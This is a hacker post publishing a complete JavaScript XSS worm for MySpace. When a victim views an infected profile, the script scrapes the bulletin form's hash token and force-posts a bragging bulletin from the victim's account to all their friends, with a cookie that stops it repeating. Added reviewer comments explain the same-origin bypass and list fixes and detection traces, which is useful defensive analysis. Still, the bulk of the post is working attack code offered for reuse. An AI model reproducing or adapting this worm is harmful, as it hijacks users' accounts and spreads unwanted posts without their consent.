MySpace Exploit found By Smokey & MX


OK, basically what this exploit does is use an active XSS vulnerability to automatically post a buddy bulletin from whoever views your site. Example:

User A visits our site
User A has now sent out a Buddy Bulletin to all his friends with whatever we want it to say

There are many variations of this exploit that you can do, this however is the one I am making public.

Here is your JS code

 // MySpace bulletin raper by Smokey
// JS File coding based on MX vBulletin worm but modified by Smokey
// Force bulletin posting and XSS method found by TrainReq & Smokey & MX
//
// Reviewer annotations (what the listing does and what a defender can take from it):
//   1. It checks for a "posted" cookie so the action runs once per browser.
//   2. It GETs the bulletin page on the current host and scrapes a `hash` value
//      out of the returned HTML.
//   3. It POSTs a bulletin to the confirmation endpoint, echoing that value back.
// The script addresses everything via document.location.host, i.e. it runs in the
// site's own origin. The same-origin policy therefore lets it read the form page,
// so a per-form token embedded in that page does not stop the request: a token
// only protects against cross-site forgery, not against script already injected
// into the origin. The root fix is on the injection side (encode/sanitise
// user-supplied profile markup, restrict script sources with a CSP); throttling or
// re-confirming broadcast actions limits the damage if injection still occurs.
// Observable traces in this listing: the `posted=true` cookie scoped to
// .myspace.com, and a script-issued GET of `fuseaction=bulletin` followed at once
// by a POST to `fuseaction=bulletin.confirmation` with an unusual
// `charset=iso-8859-2` Content-Type.

//Defines what cookie we are looking for
// checkcok is null when no "posted" marker exists yet in the victim's cookies.
var cookie  = document.cookie;
var checkcok = cookie.match(/posted/);

//Defines how the get request is going to work when we grab the hash value
// Returns an XHR object: tries the two ActiveX ProgIDs first and falls back to the
// native XMLHttpRequest constructor when both throw.
function getNewHttpObject() {
  var objType = false;
  try {
    objType = new ActiveXObject('Msxml2.XMLHTTP');
  } catch(e) {
    try {
      objType = new ActiveXObject('Microsoft.XMLHTTP');
    } catch(e) {
      objType = new XMLHttpRequest();
    }
  }
  return objType;
}

// Fetches `url` with the viewer's session and, on a 200 response, extracts the
// hash and submits the bulletin (only when the "posted" marker was absent).
function getAXAH(url){
  var theHttpRequest = getNewHttpObject();
  theHttpRequest.onreadystatechange = function() {processAXAH();};
  theHttpRequest.open("GET", url);
  theHttpRequest.send(false);

  function processAXAH(){
    // readyState 4 = request finished; only a 200 body is parsed.
    if (theHttpRequest.readyState == 4) {
      if (theHttpRequest.status == 200) {
        var str = theHttpRequest.responseText;

        //finds the hash
        // Captures whatever sits between "&hash=" and "&My" in the page source.
        // NOTE(review): presumably the form's anti-forgery token; the listing
        // does not say so explicitly.
        var hash = str.match(/&hash=([^"]+)&My/);

        //Defines subject and body
        // `body` is already URL-encoded HTML. The literal below is wrapped across
        // lines by the page extraction and is reproduced exactly as found.
        var subject = 'Smokey & Kristi are the best!';
        var body = '%3Cbr%3E%3Cbr%3E%3Ccenter%3E%3Cfont+size%3D%225%22+color%3D%22red%22%3E+Smokey+has+owned+my+account%21%21%3C%2Ffont%3E%3Cbr%3E%3Cbr%3E%3Cfont+size%3  
D%223%22%3ESup+MySpace%21++I+have+once+again+found+an+epic+sploit%21+I+am+master+of+MySpace%2C+and+no+one+forget+that%21+I+want+everyone+to+ph3ar+mi+u
b3r+l33t+h4x%21%2111%21%21%21%3Cbr%3E%3Cbr%3E%3Cbr%3E%3C%2Ffont%3E+I+am+not+bulletin+raping+for+spite%2Fhate+%2C+its+simply+for+the+fuxaround+%26lt%3B
3%3C%2Fcenter%3E%3Cbr%3E%3Cbr%3EKeep+it+nerdy+DG+style%3Cbr%3E-Smokey%3Cbr%3E+I+love+Kristi+Lee%21'
        //If user hasn't already posted set a cookie and post
        if (checkcok == null){
          // Marker cookie is set before the POST, scoped to the whole domain.
          document.cookie = "posted=true; path=/;domain=.myspace.com;";
          // Posts all the information
          // The scraped value is sent back twice, as `hashcode` and as `hash`.
          postAXAH('http://' + document.location.host + '/index.cfm?fuseaction=bulletin.confirmation&mode=5&groupID=0&userID=-1&authorID=0&messageID=0&commentID=0&commentAuthorID=0', 'groupID=0&hashcode=' + hash[1] + '&hash=' + hash[1] + '&subject='+ subject +'&body='+ body +'&allowBulletinComments=1&mode=0');
        }
      }
    }
  }
}

// Sends `params` as a form-encoded POST to `url`. (The original comment here read
// "Gets information off of the bulletin space", but the function only submits.)
// The completion handler is an empty stub: the server's response is not inspected.
function postAXAH(url, params) {
  var theHttpRequest = getNewHttpObject();
  theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);};
  theHttpRequest.open("POST", url);
  theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2');
  theHttpRequest.send(params);
  function processAXAHr(elementContainer){
    if (theHttpRequest.readyState == 4) {
      if (theHttpRequest.status == 200) {
      }
    }
  }
}

// Entry point: runs as soon as the script is evaluated in the viewer's browser.
getAXAH('http://' + document.location.host + '/index.cfm?fuseaction=bulletin');